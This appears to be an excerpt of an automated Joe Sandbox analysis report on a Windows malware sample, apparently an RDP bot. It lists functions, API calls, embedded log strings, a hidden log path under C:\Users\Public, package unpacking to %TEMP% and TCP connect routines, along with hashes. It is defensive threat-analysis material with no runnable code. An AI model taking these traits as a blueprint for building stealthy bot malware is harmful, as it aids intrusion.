GetLastError.KERNEL32 ref: 00007FF76A909CDD

Part of subcall function 00007FF76A901360: GetModuleHandleExA.KERNEL32(?,?,?,?,?,?,00007FF76A9084AF), ref: 00007FF76A90137E

strlen.MSVCRT ref: 00007FF76A909BFE
strlen.MSVCRT ref: 00007FF76A909C1A
_mbscat.MSVCRT ref: 00007FF76A909C35
strlen.MSVCRT ref: 00007FF76A909C3D
strlen.MSVCRT ref: 00007FF76A909C52
fopen.MSVCRT ref: 00007FF76A909C75

Strings

service, xrefs: 00007FF76A909B8E
[I] (%s) -> Log open success(flog_path=%s), xrefs: 00007FF76A909CA2
[E] (%s) -> Failed(err=%08x), xrefs: 00007FF76A909CC7
[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu), xrefs: 00007FF76A909CEF
debug_init, xrefs: 00007FF76A909C9B, 00007FF76A909CC0, 00007FF76A909CE8, 00007FF76A909DAD, 00007FF76A909E21
[I] (%s) -> %s, xrefs: 00007FF76A909E28
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log, xrefs: 00007FF76A909BDE, 00007FF76A909BF4, 00007FF76A909C2B, 00007FF76A909C48, 00007FF76A909C94
main.log, xrefs: 00007FF76A909C5A
[E] (%s) -> Log open failed(flog_path=%s), xrefs: 00007FF76A909DB4
Done, xrefs: 00007FF76A909E1A

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpin_mbscatfopen
String ID: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log$Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$main.log$service
API String ID: 3216678114-1460613360
Opcode ID: 8572faeb7cbf65e028c6817cb6dc2f591a0c41e37ccd003476770f88f87aa09a
Instruction ID: 859c9718f011e85a2cd8672eff467347d2533fef36422ccdd40d85fee306727d
Opcode Fuzzy Hash: 8572faeb7cbf65e028c6817cb6dc2f591a0c41e37ccd003476770f88f87aa09a
Instruction Fuzzy Hash: 82513D90E0C713C9FB25B715E9803B8B291AF557C8FF441BAD60EC6292DE6CAD46C361

Function 00007FF76A9079C0 Relevance: 29.9, APIs: 6, Strings: 11, Instructions: 193stringCOMMON

Download Yara Rule

APIs

_mbscat.MSVCRT ref: 00007FF76A907B40
strlen.MSVCRT ref: 00007FF76A907BFE
_mbscpy.MSVCRT ref: 00007FF76A907C26
_mbscpy.MSVCRT ref: 00007FF76A907C7D
strlen.MSVCRT ref: 00007FF76A907C85
strlen.MSVCRT ref: 00007FF76A907CAF

Part of subcall function 00007FF76A902515: fopen.MSVCRT ref: 00007FF76A90255A
Part of subcall function 00007FF76A902515: fseek.MSVCRT ref: 00007FF76A902579
Part of subcall function 00007FF76A902515: _errno.MSVCRT ref: 00007FF76A90258D
Part of subcall function 00007FF76A902515: _errno.MSVCRT ref: 00007FF76A9025A8

Strings

[E] (%s) -> Failed(package=%s,target=%s,err=%08x), xrefs: 00007FF76A907A40
NULL, xrefs: 00007FF76A907D0E, 00007FF76A907D1A
[I] (%s) -> Done(package=%s,target=%s), xrefs: 00007FF76A907CFD
package_unpack, xrefs: 00007FF76A907A39, 00007FF76A907A78, 00007FF76A907AA8, 00007FF76A907B89, 00007FF76A907CD0, 00007FF76A907CF6
[E] (%s) -> Entry unpack failed(package=%s,target=%s,pkg_ent=%s,pkg_ent_sz=%u,err=%08x), xrefs: 00007FF76A907B90
[I] (%s) -> Entry unpack done(package=%s,target=%s,pkg_ent=%s,pkg_ent_sz=%u), xrefs: 00007FF76A907CD7
%TEMP%, xrefs: 00007FF76A907B22
(package != NULL), xrefs: 00007FF76A907A71
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF76A907A7F, 00007FF76A907AAF
H:/Projects/rdp/bot/codebase/package.c, xrefs: 00007FF76A907A6A, 00007FF76A907A9A
(target != NULL), xrefs: 00007FF76A907AA1

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: strlen$_errno_mbscpy$_mbscatfopenfseek
String ID: %TEMP%$(package != NULL)$(target != NULL)$H:/Projects/rdp/bot/codebase/package.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Entry unpack failed(package=%s,target=%s,pkg_ent=%s,pkg_ent_sz=%u,err=%08x)$[E] (%s) -> Failed(package=%s,target=%s,err=%08x)$[I] (%s) -> Done(package=%s,target=%s)$[I] (%s) -> Entry unpack done(package=%s,target=%s,pkg_ent=%s,pkg_ent_sz=%u)$package_unpack
API String ID: 3066828623-625159688
Opcode ID: 3b16de36214f63a5e655afca7bb3e453d61e8214601823133892528394a6a068
Instruction ID: f33561a5ca60d6d12eda25e1a996fe877ff81067f8726adfe5e192c580ab3199
Opcode Fuzzy Hash: 3b16de36214f63a5e655afca7bb3e453d61e8214601823133892528394a6a068
Instruction Fuzzy Hash: 1B818161A0CB43D5FB51AB25E8403AAE760FB447D4FE441B6EA4DC7285EE7CE906C720

Function 00007FF76A908563 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 179stringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF76A901360: GetModuleHandleExA.KERNEL32(?,?,?,?,?,?,00007FF76A9084AF), ref: 00007FF76A90137E

strlen.MSVCRT ref: 00007FF76A9085D8
strlen.MSVCRT ref: 00007FF76A9085FA
_mbscpy.MSVCRT ref: 00007FF76A908616
strlen.MSVCRT ref: 00007FF76A90861E
strlen.MSVCRT ref: 00007FF76A908635
FreeLibrary.KERNEL32 ref: 00007FF76A908671
GetProcessHeap.KERNEL32 ref: 00007FF76A90872D
HeapAlloc.KERNEL32 ref: 00007FF76A908741
_mbscpy.MSVCRT ref: 00007FF76A908756

Strings

mem_alloc, xrefs: 00007FF76A908788
unit_init, xrefs: 00007FF76A9086DF
unit_cleanup, xrefs: 00007FF76A9086F6
[I] (%s) -> Done(name=%s), xrefs: 00007FF76A90883A
units_init, xrefs: 00007FF76A90871A, 00007FF76A9087F2, 00007FF76A908833
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FF76A90878F
[E] (%s) -> Failed(name=%s,err=%08x), xrefs: 00007FF76A9087F9
[I] (%s) -> Loaded(f_path=%s), xrefs: 00007FF76A908721

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: strlen$Heap_mbscpy$AllocFreeHandleLibraryModuleProcess
String ID: [E] (%s) -> Failed(name=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(name=%s)$[I] (%s) -> Loaded(f_path=%s)$mem_alloc$unit_cleanup$unit_init$units_init
API String ID: 548194777-214984806
Opcode ID: b2c2cea6912c1b1f2574cd6c8e849d591c52afe02a31096945dcbd55e0072092
Instruction ID: 81e8af0487b9fb8846bcc45c5bd97a4a58635c40e229cdc5a6905f5eb744c9c2
Opcode Fuzzy Hash: b2c2cea6912c1b1f2574cd6c8e849d591c52afe02a31096945dcbd55e0072092
Instruction Fuzzy Hash: 0D816B61B08743C5FA69BB11A4403BAF2A1AF447C8FE480B9DA4D87795DF3CE905C320

Function 00007FF76A903D81 Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 199fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,?,service,000001DE38FB13D0,?,00007FF76A9184F0,00007FF76A9084E9), ref: 00007FF76A903DD9
LockFileEx.KERNEL32(?,?,?,?,?,?,?,?,?,service,000001DE38FB13D0,?,00007FF76A9184F0,00007FF76A9084E9), ref: 00007FF76A903E12
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,service,000001DE38FB13D0,?,00007FF76A9184F0,00007FF76A9084E9), ref: 00007FF76A903EE7
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,service,000001DE38FB13D0,?,00007FF76A9184F0,00007FF76A9084E9), ref: 00007FF76A903FCC
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,service,000001DE38FB13D0,?,00007FF76A9184F0,00007FF76A9084E9), ref: 00007FF76A904140

Strings

[E] (%s) -> LockFileEx failed(path=%s,gle=%lu), xrefs: 00007FF76A903FE1
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF76A903EA1, 00007FF76A903ED1
service, xrefs: 00007FF76A903D84
NULL, xrefs: 00007FF76A90414B
(path != NULL), xrefs: 00007FF76A903E93
[E] (%s) -> CreateFileA failed(path=%s,gle=%lu), xrefs: 00007FF76A903EFC
fs_file_lock, xrefs: 00007FF76A903E66, 00007FF76A903E9A, 00007FF76A903ECA, 00007FF76A903EF5, 00007FF76A903FDA, 00007FF76A90415D
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF76A903E6D
(lock != NULL), xrefs: 00007FF76A903EC3
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF76A903E8C, 00007FF76A903EBC
[I] (%s) -> Done(path=%s,lock=%p), xrefs: 00007FF76A904164

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: ErrorFileLast$CloseCreateHandleLock
String ID: (lock != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> LockFileEx failed(path=%s,gle=%lu)$[I] (%s) -> Done(path=%s,lock=%p)$fs_file_lock$service
API String ID: 2747014929-3958755462
Opcode ID: bbb9af8f6e22d2aadefb0d8fcd95e22d4364630c4fe98b87d8be9db23a09308d
Instruction ID: 28c74ebcbcf906d81eae70ffbe16dee84a866593e73f9fc05011521a6febccea
Opcode Fuzzy Hash: bbb9af8f6e22d2aadefb0d8fcd95e22d4364630c4fe98b87d8be9db23a09308d
Instruction Fuzzy Hash: A3818410E0C70BC6F731BB25B540779E1609F613D4EF402BAC96EC66D1EE2EAD858721

Function 00007FFE1150256C Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 139networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 00007FFE11502590
htonl.WS2_32 ref: 00007FFE1150262C
htons.WS2_32 ref: 00007FFE1150263D
connect.WS2_32 ref: 00007FFE11502656
WSAGetLastError.WS2_32 ref: 00007FFE1150267C
select.WS2_32 ref: 00007FFE115026EC
WSAGetLastError.WS2_32 ref: 00007FFE115026FC
WSAGetLastError.WS2_32 ref: 00007FFE1150273E

Part of subcall function 00007FFE11502209: ioctlsocket.WS2_32 ref: 00007FFE1150222F

Part of subcall function 00007FFE11502154: setsockopt.WS2_32 ref: 00007FFE1150217C
Part of subcall function 00007FFE11502154: setsockopt.WS2_32 ref: 00007FFE115021A8

WSAGetLastError.WS2_32 ref: 00007FFE1150276B

Strings

[E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE1150275A
[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE11502783
[E] (%s) -> connection failed(host=%08x,port=%u), xrefs: 00007FFE115025F4
[W] (%s) -> select timedout(sock=0x%llx,timeo=%u), xrefs: 00007FFE1150272D
[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE1150270F
tcp_connect, xrefs: 00007FFE115025ED, 00007FFE11502708, 00007FFE11502726, 00007FFE11502753, 00007FFE1150277C, 00007FFE115027A6
[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u), xrefs: 00007FFE115027AD

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
API String ID: 3154682637-708158336
Opcode ID: 6dd717ab170c5fe0b15f106b9b85e8e896ef29de69d360d4987659121abb25b2
Instruction ID: 78a83b701d6f23120a828b067069fc48b46906f037840e619646d6407660e4a5
Opcode Fuzzy Hash: 6dd717ab170c5fe0b15f106b9b85e8e896ef29de69d360d4987659121abb25b2
Instruction Fuzzy Hash: 30511762A0CE4341E7609B97E8502BD775AAF457B0F0403BAD92E476F6EF7CE5458301

Function 00007FFE0EB450EC Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 139networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 00007FFE0EB45110
htonl.WS2_32 ref: 00007FFE0EB451AC
htons.WS2_32 ref: 00007FFE0EB451BD
connect.WS2_32 ref: 00007FFE0EB451D6
WSAGetLastError.WS2_32 ref: 00007FFE0EB451FC
select.WS2_32 ref: 00007FFE0EB4526C
WSAGetLastError.WS2_32 ref: 00007FFE0EB4527C
WSAGetLastError.WS2_32 ref: 00007FFE0EB452BE

Part of subcall function 00007FFE0EB44D89: ioctlsocket.WS2_32 ref: 00007FFE0EB44DAF

Part of subcall function 00007FFE0EB44CD4: setsockopt.WS2_32 ref: 00007FFE0EB44CFC
Part of subcall function 00007FFE0EB44CD4: setsockopt.WS2_32 ref: 00007FFE0EB44D28

WSAGetLastError.WS2_32 ref: 00007FFE0EB452EB

Strings

[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u), xrefs: 00007FFE0EB4532D
[W] (%s) -> select timedout(sock=0x%llx,timeo=%u), xrefs: 00007FFE0EB452AD
[E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE0EB452DA
[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE0EB45303
[E] (%s) -> connection failed(host=%08x,port=%u), xrefs: 00007FFE0EB45174
[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE0EB4528F
tcp_connect, xrefs: 00007FFE0EB4516D, 00007FFE0EB45288, 00007FFE0EB452A6, 00007FFE0EB452D3, 00007FFE0EB452FC, 00007FFE0EB45326

Memory Dump Source

Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd

Similarity

API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
API String ID: 3154682637-708158336
Opcode ID: b1d6f88f48f977056472bc5e2fc88cb5e718e3b35a49b9fbb396dfdf92b66e85
Instruction ID: 343caa97ffda4bfe0f4221d2e56de9c1578514f95bf3b53fc5566dca7af5dcf2
Opcode Fuzzy Hash: b1d6f88f48f977056472bc5e2fc88cb5e718e3b35a49b9fbb396dfdf92b66e85
Instruction Fuzzy Hash: 2E51C2A2A0DB4642EA349F59E8003B97761EF84764F041336E8EE466F5DE7CE5458F00

Function 00007FFE0E16256C Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 139networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 00007FFE0E162590
htonl.WS2_32 ref: 00007FFE0E16262C
htons.WS2_32 ref: 00007FFE0E16263D
connect.WS2_32 ref: 00007FFE0E162656
WSAGetLastError.WS2_32 ref: 00007FFE0E16267C
select.WS2_32 ref: 00007FFE0E1626EC
WSAGetLastError.WS2_32 ref: 00007FFE0E1626FC
WSAGetLastError.WS2_32 ref: 00007FFE0E16273E

Part of subcall function 00007FFE0E162209: ioctlsocket.WS2_32 ref: 00007FFE0E16222F

Part of subcall function 00007FFE0E162154: setsockopt.WS2_32 ref: 00007FFE0E16217C
Part of subcall function 00007FFE0E162154: setsockopt.WS2_32 ref: 00007FFE0E1621A8

WSAGetLastError.WS2_32 ref: 00007FFE0E16276B

Strings

tcp_connect, xrefs: 00007FFE0E1625ED, 00007FFE0E162708, 00007FFE0E162726, 00007FFE0E162753, 00007FFE0E16277C, 00007FFE0E1627A6
[W] (%s) -> select timedout(sock=0x%llx,timeo=%u), xrefs: 00007FFE0E16272D
[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE0E16270F
[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE0E162783
[E] (%s) -> connection failed(host=%08x,port=%u), xrefs: 00007FFE0E1625F4
[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u), xrefs: 00007FFE0E1627AD
[E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE0E16275A

Memory Dump Source

Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd

Similarity

API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
API String ID: 3154682637-708158336
Opcode ID: 38dbff91742fcd545e8c6506307d99f0f3ef583879267fb3d588f94e721ee5a1
Instruction ID: 1aa727a16737b71545cb7ab8ea98d08a4113c5f9cb354e424e22e7b6f591b79d
Opcode Fuzzy Hash: 38dbff91742fcd545e8c6506307d99f0f3ef583879267fb3d588f94e721ee5a1
Instruction Fuzzy Hash: B251C271A0C65742F6605B25E8002B97761AF85B64F14033BE9FE46AF6EE7CE545C700

Function 00007FFE11EC26AC Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 139networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 00007FFE11EC26D0
htonl.WS2_32 ref: 00007FFE11EC276C
htons.WS2_32 ref: 00007FFE11EC277D
connect.WS2_32 ref: 00007FFE11EC2796
WSAGetLastError.WS2_32 ref: 00007FFE11EC27BC
select.WS2_32 ref: 00007FFE11EC282C
WSAGetLastError.WS2_32 ref: 00007FFE11EC283C
WSAGetLastError.WS2_32 ref: 00007FFE11EC287E

Part of subcall function 00007FFE11EC2349: ioctlsocket.WS2_32 ref: 00007FFE11EC236F

Part of subcall function 00007FFE11EC2294: setsockopt.WS2_32 ref: 00007FFE11EC22BC
Part of subcall function 00007FFE11EC2294: setsockopt.WS2_32 ref: 00007FFE11EC22E8

WSAGetLastError.WS2_32 ref: 00007FFE11EC28AB

Strings

[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE11EC28C3
[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE11EC284F
[W] (%s) -> select timedout(sock=0x%llx,timeo=%u), xrefs: 00007FFE11EC286D
[E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE11EC289A
[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u), xrefs: 00007FFE11EC28ED
[E] (%s) -> connection failed(host=%08x,port=%u), xrefs: 00007FFE11EC2734
tcp_connect, xrefs: 00007FFE11EC272D, 00007FFE11EC2848, 00007FFE11EC2866, 00007FFE11EC2893, 00007FFE11EC28BC, 00007FFE11EC28E6

Memory Dump Source

Source File: 00000015.00000002.2484854998.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000015.00000002.2484834641.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484885042.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484904334.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484920861.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484937141.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484954358.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11ec0000_main.jbxd

Similarity

API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
API String ID: 3154682637-708158336
Opcode ID: 222b07809e3b9db459ce9512d8b192219b874d6750c4ceaa7239dbf5f75ae640
Instruction ID: b9097e6164efb9656990e9356f9a0176365719b3c785ee01ecd908b818073293
Opcode Fuzzy Hash: 222b07809e3b9db459ce9512d8b192219b874d6750c4ceaa7239dbf5f75ae640
Instruction Fuzzy Hash: 5351A121A0CE4382EB209FA6EC403BB6658AF84774F9423B5E82D466F5DF7DF4458700

Function 00007FFE11501D21 Relevance: 28.1, APIs: 4, Strings: 12, Instructions: 137threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE11501D3C
CreateThread.KERNEL32 ref: 00007FFE11501D7C
GetLastError.KERNEL32 ref: 00007FFE11501DC4
GetLastError.KERNEL32 ref: 00007FFE11501E9C

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

Strings

[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE11501DB0
P, xrefs: 00007FFE11501EE7
, xrefs: 00007FFE11501DE2
[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu), xrefs: 00007FFE11501DD6
ebus_init, xrefs: 00007FFE11501DA9, 00007FFE11501DCF, 00007FFE11501EA7, 00007FFE11501F9C
P, xrefs: 00007FFE11501E4B
, xrefs: 00007FFE11501EBA
[I] (%s) -> %s, xrefs: 00007FFE11501FA3
[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu), xrefs: 00007FFE11501EAE
~, xrefs: 00007FFE11501E42
Done, xrefs: 00007FFE11501F95
~, xrefs: 00007FFE11501EE2

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
API String ID: 1412730629-3633878399
Opcode ID: ba1aa4412896bc89a187ec3b5d5457ba12ff61863d0a71a2540dd986885492dd
Instruction ID: c26af020cb648a11fe49cf63d07a0879afe32f0580b4dab46ca7bde4a9f3cf10
Opcode Fuzzy Hash: ba1aa4412896bc89a187ec3b5d5457ba12ff61863d0a71a2540dd986885492dd
Instruction Fuzzy Hash: D351F761A0CF0392FB61A797A4C437C365A9F14374F6407BAC53E462F1DE6DE9858212

